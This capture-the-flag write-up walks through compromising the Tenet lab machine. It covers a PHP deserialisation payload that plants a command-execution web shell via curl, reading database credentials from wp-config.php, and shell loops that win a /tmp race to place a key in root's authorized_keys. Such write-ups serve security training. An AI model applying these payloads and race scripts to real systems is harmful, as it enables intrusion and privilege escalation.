Tenet

Gaining Access

Nmap scan:

$ nmap -p- --min-rate 5000 10.129.85.1  
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-30 08:28 EDT
Nmap scan report for 10.129.85.1
Host is up (0.0071s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Another web-based exploit. We have to add tenet.htb to our /etc/hosts file to view the website.

Tenet PHP Deserialisation

The machine has a blog-like website:

This is a Wordpress based site if we view the page source. If we view some of the comments within the pages, we can see this comment that points us towards another file:

Visiting sator.php won't do anything. Instead, visithttp://<IP>/sator.php.bak, and it would download file to our machine. Then, we can view the file contents:

<?php

class DatabaseExport
{
	public $user_file = 'users.txt';
	public $data = '';

	public function update_db()
	{
		echo '[+] Grabbing users from text file <br>';
		$this-> data = 'Success';
	}


	public function __destruct()
	{
		file_put_contents(__DIR__ . '/' . $this ->user_file, $this->data);
		echo '[] Database updated <br>';
	//	echo 'Gotta get this working properly...';
	}
}

$input = $_GET['arepo'] ?? '';
$databaseupdate = unserialize($input);

$app = new DatabaseExport;
$app -> update_db();


?>

This was an obvious deserialisation exploit at the sator.php file hosted on the IP address. As such, we can create this small bit of code that would write a new file to the machine.

<?php

class DatabaseExport {

    public $file = "cmd.php";
    public $data = '<?php system($_REQUEST["cmd"]); ?>';

}

$input = new DatabaseExport;
echo serialize($input);
?>

When run in PHP, it wouuld create a PHP Serialised object. Then, we just need to send that within the arepo parameter in a GET request to sator.php:

$ curl -G --data-urlencode 'arepo=O:14:"DatabaseExport":2:{s:9:"user_file";s:7:"cmd.php";s:4:"data";s:34:"<?php system($_REQUEST["cmd"]); ?>";}' http://10.129.85.1/sator.php

Afterwards, we can confirm we have RCE on the machine:

$ curl http://10.129.85.1/cmd.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Just spawn a reverse shell using a basic bash shell next.

Privilege Escalation

Wordpress Credentials

Now that we are in, we can read the wp-config.php file. We would find some credentials in it:

/** MySQL database username */
define( 'DB_USER', 'neil' );

/** MySQL database password */
define( 'DB_PASSWORD', 'Opera2112' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

We can then just su to neil and grab the user flag.

Sudo Race Condition

When we check sudo privileges, we see this:

www-data@tenet:/var/www/html$ sudo -l
Matching Defaults entries for www-data on tenet:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:

User www-data may run the following commands on tenet:
    (ALL : ALL) NOPASSWD: /usr/local/bin/enableSSH.sh

Here's the script:

#!/bin/bash

checkAdded() {
        sshName=$(/bin/echo $key | /usr/bin/cut -d " " -f 3)
        if [[ ! -z $(/bin/grep $sshName /root/.ssh/authorized_keys) ]]; then
                /bin/echo "Successfully added $sshName to authorized_keys file!"
        else
                /bin/echo "Error in adding $sshName to authorized_keys file!"
        fi
}

checkFile() {
        if [[ ! -s $1 ]] || [[ ! -f $1 ]]; then
                /bin/echo "Error in creating key file!"
                if [[ -f $1 ]]; then /bin/rm $1; fi
                exit 1
        fi
}

addKey() {
        tmpName=$(mktemp -u /tmp/ssh-XXXXXXXX)
        (umask 110; touch $tmpName)
        /bin/echo $key >>$tmpName
        checkFile $tmpName
        /bin/cat $tmpName >>/root/.ssh/authorized_keys
        /bin/rm $tmpName
}

This script is a classic example of a race condition attack. Since the key is temporarily created within the /tmp directory before being added to the authorized_keys folder of root, we can intercept the response by having a loop running within the /tmp directory that checks for the key's creation, then overwrite the file with my own key.

# in first SSH shell
while true; do for file in /tmp/ssh-*; do echo 'YOUR KEY VALUE' > $file ; done; done
# in another
while true; do sudo /usr/local/bin/enableSSH.sh; done

# alternatively, run this script
#!/bin/bash

while true; do
        cat id_rsa.pub | tee /tmp/ssh-*
        sudo /usr/local/bin/enableSSH.sh
done

After a while, we should get an error like this:

Then we can just SSH to root.

Rooted!